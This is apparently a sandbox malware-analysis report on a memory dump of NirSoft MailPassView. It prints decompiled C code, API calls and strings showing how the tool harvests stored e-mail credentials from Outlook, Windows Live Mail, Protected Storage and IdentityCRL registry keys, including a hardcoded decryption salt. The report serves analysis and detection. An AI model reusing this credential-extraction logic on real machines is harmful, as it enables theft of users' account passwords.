0x0040baa5
0x00000000
0x0040baa5
0x0040ba65
0x00000000
0x0040ba2d
0x0040ba2d
0x0040ba37
0x0040bbe9
0x0040bbe9
0x0040bbf0
0x0040bbf8
0x0040bbfd
0x0040bc05
0x0040bc0e
0x0040bc14
0x0040bc14
0x0040bc1b
0x0040bc1f
0x0040bc27
0x0040bc30
0x0040bc39
0x0040bc3e
0x0040bc3e
0x00000000
0x0040bc3e
0x0040b9cd
0x0040b9cd
0x0040bc40
0x0040bc46
0x0040bc46

APIs

Part of subcall function 00404837: LoadLibraryA.KERNEL32(comctl32.dll,74E04DE0,?,00000000,?,?,?,0040B9C9,74E04DE0), ref: 00404856
Part of subcall function 00404837: GetProcAddress.KERNEL32(00000000,InitCommonControlsEx), ref: 00404868
Part of subcall function 00404837: FreeLibrary.KERNEL32(00000000,?,00000000,?,?,?,0040B9C9,74E04DE0), ref: 0040487C
Part of subcall function 00404837: MessageBoxA.USER32 ref: 004048A7

??3@YAXPAX@Z.MSVCRT ref: 0040BBF8
DeleteObject.GDI32(?), ref: 0040BC0E

Strings

Failed to load the executable file !, xrefs: 0040BA9F
, xrefs: 0040B9E7
Error, xrefs: 0040BA9A
/savelangfile, xrefs: 0040BA1F
/deleteregkey, xrefs: 0040BA4D
Software\NirSoft\MailPassView, xrefs: 0040BA5B

Memory Dump Source

Source File: 0000000B.00000002.321594034.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000B.00000002.321610975.0000000000418000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: Library$??3@AddressDeleteFreeLoadMessageObjectProc
String ID: $/deleteregkey$/savelangfile$Error$Failed to load the executable file !$Software\NirSoft\MailPassView
API String ID: 745651260-414181363
Opcode ID: 16f53dabeb4a883268802abd1063420dcaf51a14d4cbe642e390ff1ea210f197
Instruction ID: 29be9d14b742f54cd69d53bb86675b71f99c80547e1740e7b57482248bd42427
Opcode Fuzzy Hash: 16f53dabeb4a883268802abd1063420dcaf51a14d4cbe642e390ff1ea210f197
Instruction Fuzzy Hash: 9D518D71108345ABC7209F61DD09A9BBBF8FF84705F00483FF685A22A1DB789914CB5E

Uniqueness

Uniqueness Score: -1.00%

Function 00403C3D, Relevance: 24.7, APIs: 3, Strings: 11, Instructions: 170
librarystringloaderCOMMON

Download Yara Rule

C-Code - Quality: 65%

			E00403C3D(signed int __ecx, void* __eflags, void* __fp0) {
				char _v8;
				void* __edi;
				void* __esi;
				struct HINSTANCE__* _t38;
				void* _t52;
				void* _t54;
				void* _t56;
				void* _t58;
				void* _t60;
				char* _t73;
				void* _t76;
				_Unknown_base(*)()* _t86;
				void* _t87;
				void* _t89;
				signed int _t98;
				char* _t106;
				_Unknown_base(*)()* _t120;
				void* _t131;

				_t131 = __fp0;
				_t91 = __ecx;
				_push(__ecx);
				_t98 = __ecx;
				_t89 = __ecx + 0x87c;
				 *(_t89 + 0xc) =  *(_t89 + 0xc) & 0x00000000;
				E0040E894(_t89);
				_t38 = LoadLibraryA("pstorec.dll"); // executed
				 *(_t89 + 8) = _t38;
				if(_t38 == 0) {
					L4:
					E0040E894(_t89);
				} else {
					_t86 = GetProcAddress(_t38, "PStoreCreateInstance");
					_t120 = _t86;
					_t91 = 0 | _t120 != 0x00000000;
					 *(_t89 + 0x10) = _t86;
					if(_t120 != 0) {
						goto L4;
					} else {
						_t91 = _t89 + 4;
						_t87 =  *_t86(_t89 + 4, 0, 0, 0);
						_t122 = _t87;
						if(_t87 != 0) {
							goto L4;
						} else {
							 *(_t89 + 0xc) = 1;
						}
					}
				}
				E004047A0(_t98 + 0x890, _t122);
				E004036CC(_t91, _t98, _t98 + 0x890, _t131, L"www.google.com/Please log in to your Gmail account");
				E004036CC(_t91, _t98, _t98 + 0x890, _t131, L"www.google.com:443/Please log in to your Gmail account");
				E004036CC(_t91, _t98, _t98 + 0x890, _t131, L"www.google.com/Please log in to your Google Account");
				E004036CC(_t91, _t98, _t98 + 0x890, _t131, L"www.google.com:443/Please log in to your Google Account");
				_push(_t98 + 0x858); // executed
				E0040754D(_t91, _t122); // executed
				E0040719C(_t91, _t98 + 0x86c); // executed
				E0040765B(_t122, _t98 + 0x878); // executed
				_t52 = E0040EB3F(0x80000001, "Software\\Microsoft\\Internet Account Manager\\Accounts",  &_v8);
				_t123 = _t52;
				if(_t52 == 0) {
					E00402BB8(_t91,  &_v8, _t123, _t131, _t98, 1);
				}
				_t54 = E0040EB3F(0x80000001, "Software\\Microsoft\\Office\\Outlook\\OMI Account Manager\\Accounts",  &_v8);
				_t124 = _t54;
				if(_t54 == 0) {
					E00402BB8(_t91,  &_v8, _t124, _t131, _t98, 5);
				}
				E00402C44(_t91, _t131, _t98); // executed
				 *((intOrPtr*)(_t98 + 0xb1c)) = 6;
				_t56 = E00406278();
				_push( &_v8);
				if( *((intOrPtr*)(_t56 + 0x10)) != 1) {
					_push("Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles");
				} else {
					_push("Software\\Microsoft\\Windows Messaging Subsystem\\Profiles");
				}
				_push(0x80000001);
				_t58 = E0040EB3F();
				_t126 = _t58;
				if(_t58 != 0) {
					 *((char*)(_t98 + 0xa9c)) = 0;
				} else {
					E00402B09( &_v8, _t126, _t131, _t98);
				}
				 *((intOrPtr*)(_t98 + 0xb1c)) = 0xf;
				_t60 = E0040EB3F(0x80000001, "Software\\Microsoft\\Office\\15.0\\Outlook\\Profiles",  &_v8);
				_t127 = _t60;
				if(_t60 != 0) {
					 *((char*)(_t98 + 0xa9c)) = 0;
				} else {
					E00402B09( &_v8, _t127, _t131, _t98);
				}
				E0040E8AB(_t89);
				E004047F1(_t98 + 0x890);
				E00402FC2(_t98, _t91, _t131, 0x80000001); // executed
				E00402FC2(_t98, _t91, _t131, 0x80000002); // executed
				E0040329E(_t131, _t98);
				E004034CB(_t91, _t127, _t131, _t98); // executed
				E0040396C(_t127, _t131, _t98); // executed
				E004037B1(_t91, _t98, _t131, _t98); // executed
				_t73 = _t98 + 0xb20;
				_t128 =  *_t73;
				if( *_t73 != 0) {
					 *((intOrPtr*)(_t98 + 0xf34)) = 0xa;
					E0040D37A(_t98 + 0x1c8, _t128, _t73, 0);
				}
				_t106 = _t98 + 0xc25;
				_t129 =  *_t106;
				if( *_t106 != 0) {
					strcpy(_t98 + 0x52a, _t98 + 0xe2f);
					 *((intOrPtr*)(_t98 + 0xf34)) = 0xb;
					E0040D37A(_t98 + 0x1c8, _t129, _t106, 0);
				}
				_push(_t98 + 0x640); // executed
				E0040D9F9(_t129); // executed
				E0040D865(_t98 + 0x640);
				_t76 = E00410D1B(_t98 + 0x870, _t98 + 0x870); // executed
				return _t76;
			}

0x00403c3d
0x00403c3d
0x00403c40
0x00403c44
0x00403c46
0x00403c4c
0x00403c52
0x00403c5c
0x00403c66
0x00403c69
0x00403c9b
0x00403c9d
0x00403c6b
0x00403c71
0x00403c79
0x00403c7b
0x00403c7e
0x00403c83
0x00000000
0x00403c85
0x00403c88
0x00403c8c
0x00403c8e
0x00403c90
0x00000000
0x00403c92
0x00403c92
0x00403c92
0x00403c90
0x00403c83
0x00403ca8
0x00403cb2
0x00403cbc
0x00403cc6
0x00403cd0
0x00403cdb
0x00403cdc
0x00403ce8
0x00403cf4
0x00403d07
0x00403d0f
0x00403d11
0x00403d19
0x00403d19
0x00403d2c
0x00403d34
0x00403d36
0x00403d3e
0x00403d3e
0x00403d44
0x00403d49
0x00403d53
0x00403d5f
0x00403d60
0x00403d69
0x00403d62
0x00403d62
0x00403d62
0x00403d6e
0x00403d73
0x00403d7b
0x00403d7d
0x00403d8a
0x00403d7f
0x00403d83
0x00403d83
0x00403d9f
0x00403da9
0x00403db1
0x00403db3
0x00403dc0
0x00403db5
0x00403db9
0x00403db9
0x00403dc9
0x00403dd4
0x00403de0
0x00403dec
0x00403df2
0x00403df8
0x00403dfe
0x00403e04
0x00403e09
0x00403e0f
0x00403e12
0x00403e1d
0x00403e27
0x00403e27
0x00403e2c
0x00403e32
0x00403e35
0x00403e45
0x00403e55
0x00403e5f
0x00403e5f
0x00403e6a
0x00403e6b
0x00403e71
0x00403e7d
0x00403e86

APIs

Part of subcall function 0040E894: FreeLibrary.KERNELBASE(?,0040E8C8,?,?,?,?,?,?,0040421D), ref: 0040E8A0

LoadLibraryA.KERNELBASE(pstorec.dll), ref: 00403C5C
GetProcAddress.KERNEL32(00000000,PStoreCreateInstance), ref: 00403C71
strcpy.MSVCRT(?,?), ref: 00403E45

Strings

Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts, xrefs: 00403D22
www.google.com/Please log in to your Google Account, xrefs: 00403CC1
Software\Microsoft\Office\15.0\Outlook\Profiles, xrefs: 00403D95
www.google.com:443/Please log in to your Gmail account, xrefs: 00403CB7
www.google.com/Please log in to your Gmail account, xrefs: 00403CAD
Software\Microsoft\Internet Account Manager\Accounts, xrefs: 00403CFD
PStoreCreateInstance, xrefs: 00403C6B
Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles, xrefs: 00403D69
pstorec.dll, xrefs: 00403C57
www.google.com:443/Please log in to your Google Account, xrefs: 00403CCB
Software\Microsoft\Windows Messaging Subsystem\Profiles, xrefs: 00403D62

Memory Dump Source

Source File: 0000000B.00000002.321594034.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000B.00000002.321610975.0000000000418000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: Library$AddressFreeLoadProcstrcpy
String ID: PStoreCreateInstance$Software\Microsoft\Internet Account Manager\Accounts$Software\Microsoft\Office\15.0\Outlook\Profiles$Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts$Software\Microsoft\Windows Messaging Subsystem\Profiles$Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles$pstorec.dll$www.google.com/Please log in to your Gmail account$www.google.com/Please log in to your Google Account$www.google.com:443/Please log in to your Gmail account$www.google.com:443/Please log in to your Google Account
API String ID: 2884822230-961845771
Opcode ID: 736501e530afa2727e5d55e5ce378ede5b836f248ef61c614794b5a243445e0a
Instruction ID: d05da07ce2d894a49ef5f331cfc6c83e82fbb8602fa7f27bb7646818df223e42
Opcode Fuzzy Hash: 736501e530afa2727e5d55e5ce378ede5b836f248ef61c614794b5a243445e0a
Instruction Fuzzy Hash: 9B51D771600605B6D714BF72CD46BEABB6CAF00709F10053FF905B61C2DBBCAA5587A9

Uniqueness

Uniqueness Score: -1.00%

Function 0040D9F9, Relevance: 21.1, APIs: 8, Strings: 4, Instructions: 101
registryCOMMON

Download Yara Rule

C-Code - Quality: 96%

			E0040D9F9(void* __eflags, void* _a4, int _a8, int _a12, void* _a16, char _a20, void* _a24, int _a28, void* _a32, int _a36, void _a40, void _a104) {
				void* _v0;
				void* __esi;
				long _t34;
				long _t36;
				long _t40;
				void* _t64;
				void* _t68;
				int _t73;

				E004118A0(0x102c, _t64);
				_t34 = RegOpenKeyExA(0x80000001, "Software\\Microsoft\\IdentityCRL", 0, 0x20019,  &_v0); // executed
				if(_t34 != 0) {
					L10:
					return _t34;
				}
				_t36 = RegOpenKeyExA(_v0, "Dynamic Salt", 0, 0x20019,  &_a4); // executed
				if(_t36 != 0) {
					L9:
					_t34 = RegCloseKey(_v0); // executed
					goto L10;
				}
				_a8 = 0x1000;
				_t40 = RegQueryValueExA(_a4, "Value", 0,  &_a36,  &_a40,  &_a8);
				_t81 = _t40;
				if(_t40 == 0) {
					_t63 = _a4 + 0xc;
					if(E004047A0(_a4 + 0xc, _t81) != 0) {
						_a20 = _a8;
						_a24 =  &_a40;
						_t73 = 0x40;
						_t68 = L"%GKP$^%^&LL(%^$^O&TR$^%^GV6;lxzd";
						_a28 = _t73;
						_a32 = _t68;
						if(E00404811(_t63,  &_a20,  &_a28,  &_a12) != 0) {
							if(_a12 < 0x400) {
								memcpy( &_a40, _t68, _t73);
								memcpy( &_a104, _a16, _a12);
								E0040D6FB(_t64, _a12 + _t73, _a4,  &_a40, _a12 + _t73, _v0);
							}
							LocalFree(_a16);
						}
					}
				}
				RegCloseKey(_a4);
				goto L9;
			}

0x0040da04
0x0040da2a
0x0040da2e
0x0040db30
0x0040db36
0x0040db36
0x0040da44
0x0040da48
0x0040db26
0x0040db2a
0x00000000
0x0040db2a
0x0040da67
0x0040da6f
0x0040da75
0x0040da77
0x0040da80
0x0040da8c
0x0040da96
0x0040daa0
0x0040daa4
0x0040dab4
0x0040dabb
0x0040dabf
0x0040daca
0x0040dad4
0x0040dadd
0x0040daf2
0x0040db0d
0x0040db0d
0x0040db16
0x0040db16
0x0040daca
0x0040da8c
0x0040db20
0x00000000

APIs

RegOpenKeyExA.KERNELBASE(80000001,Software\Microsoft\IdentityCRL,00000000,00020019,?,?,?,?,?,00403E70,?), ref: 0040DA2A
RegOpenKeyExA.KERNELBASE(?,Dynamic Salt,00000000,00020019,?,?,?,?,?,00403E70,?), ref: 0040DA44
RegQueryValueExA.ADVAPI32(?,Value,00000000,?,?,?,?,?,?,?,00403E70,?), ref: 0040DA6F
RegCloseKey.ADVAPI32(?,?,?,?,?,00403E70,?), ref: 0040DB20

Part of subcall function 004047A0: LoadLibraryA.KERNELBASE(?,0040D60E,80000001,74B5F420), ref: 004047A8
Part of subcall function 004047A0: GetProcAddress.KERNEL32(00000000,?), ref: 004047C0

memcpy.MSVCRT ref: 0040DADD
memcpy.MSVCRT ref: 0040DAF2

Part of subcall function 0040D6FB: RegOpenKeyExA.ADVAPI32(0040DB12,Creds,00000000,00020019,0040DB12,%GKP$^%^&LL(%^$^O&TR$^%^GV6;lxzd,00000040,?,?,0040DB12,?,?,?,?), ref: 0040D725
Part of subcall function 0040D6FB: memset.MSVCRT ref: 0040D743
Part of subcall function 0040D6FB: RegEnumKeyA.ADVAPI32(?,00000000,?,000000FF), ref: 0040D847
Part of subcall function 0040D6FB: RegCloseKey.ADVAPI32(?), ref: 0040D858

LocalFree.KERNEL32(?,?,00001000,?,?,?,?,?,00403E70,?), ref: 0040DB16
RegCloseKey.KERNELBASE(?,?,?,?,?,00403E70,?), ref: 0040DB2A

Strings

Software\Microsoft\IdentityCRL, xrefs: 0040DA20
%GKP$^%^&LL(%^$^O&TR$^%^GV6;lxzd, xrefs: 0040DAB4, 0040DADB
Value, xrefs: 0040DA5E
Dynamic Salt, xrefs: 0040DA3B

Memory Dump Source

Source File: 0000000B.00000002.321594034.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000B.00000002.321610975.0000000000418000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: CloseOpen$memcpy$AddressEnumFreeLibraryLoadLocalProcQueryValuememset
String ID: %GKP$^%^&LL(%^$^O&TR$^%^GV6;lxzd$Dynamic Salt$Software\Microsoft\IdentityCRL$Value
API String ID: 2768085393-1693574875
Opcode ID: 2702e5b6582a814fc20eadb9384ec418d8613a8c7f334e4e23fc0615c867cd5e
Instruction ID: 6117dd664a6da5d1700893ef21bfd696e4846e6baba0a559227c27352822965f
Opcode Fuzzy Hash: 2702e5b6582a814fc20eadb9384ec418d8613a8c7f334e4e23fc0615c867cd5e
Instruction Fuzzy Hash: 95316D72504344AFD700DF55DC40D9BBBECEB88358F40493EFA84E2160E774DA188B6A

Uniqueness

Uniqueness Score: -1.00%

Function 00411654, Relevance: 18.1, APIs: 12, Instructions: 128
COMMON

Download Yara Rule

C-Code - Quality: 82%

			_entry_(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				struct HINSTANCE__* _t33;
				intOrPtr* _t35;
				intOrPtr* _t36;
				void* _t39;
				void _t41;
				intOrPtr _t48;
				signed int _t50;
				int _t52;
				intOrPtr _t55;
				signed int _t56;
				signed int _t57;
				intOrPtr _t62;
				intOrPtr _t63;
				intOrPtr* _t65;
				intOrPtr* _t69;
				int _t70;
				void* _t71;
				intOrPtr _t79;

				_push(0x70);
				_push(0x4123e0);
				E00411840(__ebx, __edi, __esi);
				_t33 = GetModuleHandleA(0);
				if(_t33->i != 0x5a4d) {
					L4:
					 *(_t71 - 0x1c) = 0;
				} else {
					_t65 =  *((intOrPtr*)(_t33 + 0x3c)) + _t33;
					if( *_t65 != 0x4550) {
						goto L4;
					} else {
						_t56 =  *(_t65 + 0x18) & 0x0000ffff;
						if(_t56 == 0x10b) {
							__eflags =  *((intOrPtr*)(_t65 + 0x74)) - 0xe;
							if( *((intOrPtr*)(_t65 + 0x74)) <= 0xe) {
								goto L4;
							} else {
								_t57 = 0;
								__eflags =  *(_t65 + 0xe8);
								goto L9;
							}
						} else {
							if(_t56 == 0x20b) {
								__eflags =  *((intOrPtr*)(_t65 + 0x84)) - 0xe;
								if( *((intOrPtr*)(_t65 + 0x84)) <= 0xe) {
									goto L4;
								} else {
									_t57 = 0;
									__eflags =  *(_t65 + 0xf8);
									L9:
									_t9 = __eflags != 0;
									__eflags = _t9;
									 *(_t71 - 0x1c) = _t57 & 0xffffff00 | _t9;
								}
							} else {
								goto L4;
							}
						}
					}
				}
				 *(_t71 - 4) = 0;
				__set_app_type(2);
				 *0x417b6c =  *0x417b6c | 0xffffffff;
				 *0x417b70 =  *0x417b70 | 0xffffffff;
				_t35 = __p__fmode();
				_t62 =  *0x416b8c; // 0x0
				 *_t35 = _t62;
				_t36 = __p__commode();
				_t63 =  *0x416b88; // 0x0
				 *_t36 = _t63;
				 *0x417b68 =  *_adjust_fdiv;
				_t39 = E00401A4D();
				_t79 =  *0x416000; // 0x1
				if(_t79 == 0) {
					__setusermatherr(E00401A4D);
					_pop(_t63);
				}
				E0041182C(_t39);
				_push(0x4123b0);
				_push(0x4123ac);
				L00411826();
				_t41 =  *0x416b84; // 0x0
				 *(_t71 - 0x20) = _t41;
				 *(_t71 - 0x30) = __getmainargs(_t71 - 0x2c, _t71 - 0x28, _t71 - 0x24,  *0x416b80, _t71 - 0x20);
				_push(0x4123a8);
				_push(0x412394); // executed
				L00411826(); // executed
				_t69 =  *_acmdln;
				 *((intOrPtr*)(_t71 - 0x34)) = _t69;
				if( *_t69 != 0x22) {
					while(1) {
						__eflags =  *_t69 - 0x20;
						if(__eflags <= 0) {
							goto L17;
						}
						_t69 = _t69 + 1;
						 *((intOrPtr*)(_t71 - 0x34)) = _t69;
					}
				} else {
					do {
						_t69 = _t69 + 1;
						 *((intOrPtr*)(_t71 - 0x34)) = _t69;
						_t55 =  *_t69;
					} while (_t55 != 0 && _t55 != 0x22);
					if( *_t69 == 0x22) {
						L16:
						_t69 = _t69 + 1;
						 *((intOrPtr*)(_t71 - 0x34)) = _t69;
					}
				}
				L17:
				_t48 =  *_t69;
				if(_t48 != 0 && _t48 <= 0x20) {
					goto L16;
				}
				 *(_t71 - 0x4c) = 0;
				GetStartupInfoA(_t71 - 0x78);
				_t87 =  *(_t71 - 0x4c) & 0x00000001;
				if(( *(_t71 - 0x4c) & 0x00000001) == 0) {
					_t50 = 0xa;
				} else {
					_t50 =  *(_t71 - 0x48) & 0x0000ffff;
				}
				_t52 = E0040B9AD(_t63, _t87, GetModuleHandleA(0), 0, _t69, _t50); // executed
				_t70 = _t52;
				 *(_t71 - 0x7c) = _t70;
				if( *(_t71 - 0x1c) == 0) {
					exit(_t70); // executed
				}
				__imp___cexit();
				 *(_t71 - 4) =  *(_t71 - 4) | 0xffffffff;
				return E00411879(_t70);
			}

0x00411654
0x00411656
0x0041165b
0x00411669
0x00411670
0x00411691
0x00411691
0x00411672
0x00411675
0x0041167d
0x00000000
0x0041167f
0x0041167f
0x00411688
0x004116a9
0x004116ad
0x00000000
0x004116af
0x004116af
0x004116b1
0x00000000
0x004116b1
0x0041168a
0x0041168f
0x00411696
0x0041169d
0x00000000
0x0041169f
0x0041169f
0x004116a1
0x004116b7
0x004116b7
0x004116b7
0x004116ba
0x004116ba
0x00000000
0x00000000
0x00000000
0x0041168f
0x00411688
0x0041167d
0x004116bd
0x004116c2
0x004116c9
0x004116d0
0x004116d7
0x004116dd
0x004116e3
0x004116e5
0x004116eb
0x004116f1
0x004116fa
0x004116ff
0x00411704
0x0041170a
0x00411711
0x00411717
0x00411717
0x00411718
0x0041171d
0x00411722
0x00411727
0x0041172c
0x00411731
0x00411750
0x00411753
0x00411758
0x0041175d
0x0041176a
0x0041176c
0x00411772
0x004117ae
0x004117ae
0x004117b1
0x00000000
0x00000000
0x004117b3
0x004117b4
0x004117b4
0x00411774
0x00411774
0x00411774
0x00411775
0x00411778
0x0041177a
0x00411785
0x00411787
0x00411787
0x00411788
0x00411788
0x00411785
0x0041178b
0x0041178b
0x0041178f
0x00000000
0x00000000
0x00411795
0x0041179c
0x004117a2
0x004117a6
0x004117bb
0x004117a8
0x004117a8
0x004117a8
0x004117c3
0x004117c8
0x004117ca
0x004117d0
0x004117d3
0x004117d3
0x004117d9
0x0041180e
0x00411819

APIs

GetModuleHandleA.KERNEL32(00000000,004123E0,00000070), ref: 00411669
__set_app_type.MSVCRT ref: 004116C2
__p__fmode.MSVCRT ref: 004116D7
__p__commode.MSVCRT ref: 004116E5
__setusermatherr.MSVCRT ref: 00411711
_initterm.MSVCRT ref: 00411727
__getmainargs.MSVCRT ref: 0041174A
_initterm.MSVCRT ref: 0041175D
GetStartupInfoA.KERNEL32(?), ref: 0041179C
GetModuleHandleA.KERNEL32(00000000,00000000,?,0000000A), ref: 004117C0
exit.KERNELBASE ref: 004117D3
_cexit.MSVCRT ref: 004117D9

Memory Dump Source

Source File: 0000000B.00000002.321594034.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000B.00000002.321610975.0000000000418000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: HandleModule_initterm$InfoStartup__getmainargs__p__commode__p__fmode__set_app_type__setusermatherr_cexitexit
String ID:
API String ID: 3662548030-0
Opcode ID: d1e6738c7006840e8ff29ac4bb5a107ed27e41239026a4511230c59facba65b5
Instruction ID: d7daaed26df3896bd014a213398510a4c94beeaf1e1b2d32e797684dc565bfa8
Opcode Fuzzy Hash: d1e6738c7006840e8ff29ac4bb5a107ed27e41239026a4511230c59facba65b5
Instruction Fuzzy Hash: 60416DB0D40218DFCB209FA4D984AED7BB4AB08314F24857BE661D72A1D77D99C2CB5C

Uniqueness

Uniqueness Score: -1.00%

Function 00410D1B, Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 97
stringCOMMON

Download Yara Rule

C-Code - Quality: 92%

			E00410D1B(void* __eflags, intOrPtr _a4) {
				void _v275;
				char _v276;
				char _v532;
				void _v539;
				char _v540;
				void _v795;
				char _v796;
				void* __edi;
				void* __esi;
				int _t44;
				char* _t46;
				char* _t48;
				void* _t64;
				intOrPtr _t65;
				void* _t66;
				signed int _t68;
				void* _t74;
				void* _t75;

				_t75 = __eflags;
				_v796 = 0;
				memset( &_v795, 0, 0x104);
				_t64 = 0x1c;
				_t61 =  &_v796;
				 *((intOrPtr*)(_a4 + 4)) = 1;
				E0040EE59( &_v796, _t64); // executed
				E00406734( &_v796, "\\Microsoft\\Windows Mail");
				_t65 = _a4;
				E00410C43(_t65, _t75, _t61); // executed
				 *((intOrPtr*)(_t65 + 4)) = 2;
				_t66 = 0x1c;
				E0040EE59(_t61, _t66);
				E00406734(_t61, "\\Microsoft\\Windows Live Mail");
				E00410C43(_a4, _t75, _t61); // executed
				_v276 = 0;
				memset( &_v275, 0, 0x104);
				_v540 = 0;
				memset( &_v539, 0, 0x104);
				E0040EBC1(_a4, 0x80000001, "Software\\Microsoft\\Windows Live Mail", "Store Root",  &_v276, 0x104); // executed
				_t74 = (_t68 & 0xfffffff8) - 0x31c + 0x38;
				ExpandEnvironmentStringsA( &_v276,  &_v540, 0x104);
				_t44 = strlen( &_v540);
				if(_t44 > 0) {
					_t48 = _t74 + _t44 + 0x117;
					if( *_t48 == 0x5c) {
						 *_t48 = 0;
					}
				}
				_push( &_v532);
				_t46 =  &_v796;
				_push(_t46);
				L004115B2();
				_t78 = _t46;
				if(_t46 != 0) {
					_t46 = E00410C43(_a4, _t78,  &_v532); // executed
				}
				return _t46;
			}

0x00410d1b
0x00410d37
0x00410d3c
0x00410d49
0x00410d4a
0x00410d4e
0x00410d55
0x00410d5f
0x00410d64
0x00410d6d
0x00410d72
0x00410d7b
0x00410d7c
0x00410d86
0x00410d92
0x00410da2
0x00410daa
0x00410dbd
0x00410dc5
0x00410de5
0x00410dea
0x00410dfe
0x00410e0c
0x00410e14
0x00410e16
0x00410e20
0x00410e22
0x00410e22
0x00410e20
0x00410e2c
0x00410e2d
0x00410e31
0x00410e32
0x00410e37
0x00410e3b
0x00410e48
0x00410e48
0x00410e53

APIs

memset.MSVCRT ref: 00410D3C

Part of subcall function 00406734: strlen.MSVCRT ref: 00406736
Part of subcall function 00406734: strlen.MSVCRT ref: 00406741
Part of subcall function 00406734: strcat.MSVCRT(00000000,dA,0000001C,00410D64,\Microsoft\Windows Mail,?,?,?), ref: 00406758

Part of subcall function 0040EE59: memset.MSVCRT ref: 0040EEAE
Part of subcall function 0040EE59: RegCloseKey.ADVAPI32(00000000,?,?,?,?,?,?,?,?,00000104), ref: 0040EF17
Part of subcall function 0040EE59: strcpy.MSVCRT(00000000,?,?,?,?,?,?,00000104), ref: 0040EF25

memset.MSVCRT ref: 00410DAA
memset.MSVCRT ref: 00410DC5

Part of subcall function 0040EBC1: RegCloseKey.ADVAPI32(000003FF,?,?,?,?,00000000,000003FF), ref: 0040EBFA

ExpandEnvironmentStringsA.KERNEL32(?,?,00000104,?,?,?,?,?,?,00000000,00000104,00000104,?,?,?,?), ref: 00410DFE
strlen.MSVCRT ref: 00410E0C
_stricmp.MSVCRT(?,?,?,?,?,?,?,?,00000000,00000104,00000104,?,?,?,?,?), ref: 00410E32

Strings

\Microsoft\Windows Live Mail, xrefs: 00410D81
Store Root, xrefs: 00410DD6
Software\Microsoft\Windows Live Mail, xrefs: 00410DDB
\Microsoft\Windows Mail, xrefs: 00410D5A

Memory Dump Source

Source File: 0000000B.00000002.321594034.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000B.00000002.321610975.0000000000418000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: memset$strlen$Close$EnvironmentExpandStrings_stricmpstrcatstrcpy
String ID: Software\Microsoft\Windows Live Mail$Store Root$\Microsoft\Windows Live Mail$\Microsoft\Windows Mail
API String ID: 4071991895-2578778931
Opcode ID: 446d342accadaa8f5357ef9c7141ad4d55f165afb8774a5b515e9d11a0344459
Instruction ID: 656a87abbde68b626b6b67706479efffa51c3f1aad4b8967eb2d69b922da332e
Opcode Fuzzy Hash: 446d342accadaa8f5357ef9c7141ad4d55f165afb8774a5b515e9d11a0344459
Instruction Fuzzy Hash: 3D318DB2548348ABD324E799DC46FCB77DC9BC4318F04482FF649D7182E678D68487AA

Uniqueness

Uniqueness Score: -1.00%

Function 00404837, Relevance: 15.8, APIs: 5, Strings: 4, Instructions: 52
libraryloaderwindowCOMMON

Download Yara Rule

C-Code - Quality: 58%

			E00404837(void* __ecx) {
				intOrPtr _v8;
				char _v12;
				struct HWND__* _t6;
				_Unknown_base(*)()* _t11;
				struct HWND__* _t13;
				struct HWND__* _t15;
				void* _t20;
				struct HINSTANCE__* _t23;

				_v12 = 8;
				_v8 = 0xff;
				_t15 = 0;
				_t20 = 0;
				_t23 = LoadLibraryA("comctl32.dll");
				if(_t23 == 0) {
					L5:
					__imp__#17();
					_t6 = 1;
					L6:
					if(_t6 != 0) {
						return 1;
					} else {
						MessageBoxA(_t6, "Error: Cannot load the common control classes.", "Error", 0x30);
						return 0;
					}
				}
				_t11 = GetProcAddress(_t23, "InitCommonControlsEx");
				if(_t11 != 0) {
					_t20 = 1; // executed
					_t13 =  *_t11( &_v12); // executed
					_t15 = _t13;
				}
				FreeLibrary(_t23);
				if(_t20 == 0) {
					goto L5;
				} else {
					_t6 = _t15;
					goto L6;
				}
			}

0x00404844
0x0040484b
0x00404852
0x00404854
0x0040485c
0x00404860
0x0040488a
0x0040488a
0x00404892
0x00404893
0x00404898
0x004048b5
0x0040489a
0x004048a7
0x004048b0
0x004048b0
0x00404898
0x00404868
0x00404870
0x00404876
0x00404877
0x00404879
0x00404879
0x0040487c
0x00404884
0x00000000
0x00404886
0x00404886
0x00000000
0x00404886

APIs

LoadLibraryA.KERNEL32(comctl32.dll,74E04DE0,?,00000000,?,?,?,0040B9C9,74E04DE0), ref: 00404856
GetProcAddress.KERNEL32(00000000,InitCommonControlsEx), ref: 00404868
FreeLibrary.KERNEL32(00000000,?,00000000,?,?,?,0040B9C9,74E04DE0), ref: 0040487C
#17.COMCTL32(?,00000000,?,?,?,0040B9C9,74E04DE0), ref: 0040488A
MessageBoxA.USER32 ref: 004048A7

Strings

Error: Cannot load the common control classes., xrefs: 004048A1
comctl32.dll, xrefs: 0040483F
InitCommonControlsEx, xrefs: 00404862
Error, xrefs: 0040489C

Memory Dump Source

Source File: 0000000B.00000002.321594034.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000B.00000002.321610975.0000000000418000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: Library$AddressFreeLoadMessageProc
String ID: Error$Error: Cannot load the common control classes.$InitCommonControlsEx$comctl32.dll
API String ID: 2780580303-317687271
Opcode ID: d22177ebd0c61848c13c07c1ee885c4d1d7d21c72c3c38fe6be86b3f4f770b99
Instruction ID: 848b23aeb75660b77c3c697252adc3032e5e70f3caa3a854567a53d2e3e71345
Opcode Fuzzy Hash: d22177ebd0c61848c13c07c1ee885c4d1d7d21c72c3c38fe6be86b3f4f770b99
Instruction Fuzzy Hash: 3E0126723102017FD7156BA08D48BAF7AACEB84749F008139F602E21C0EBF8C912D6AC

